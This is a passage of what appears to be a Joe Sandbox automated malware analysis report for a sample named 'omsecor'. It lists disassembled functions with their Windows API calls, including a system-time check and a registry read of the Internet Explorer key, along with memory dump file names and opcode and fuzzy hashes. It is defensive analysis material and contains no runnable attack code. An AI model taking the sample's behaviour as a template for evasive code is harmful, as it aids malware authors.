                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer
                  • API String ID: 71445658-938904094
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC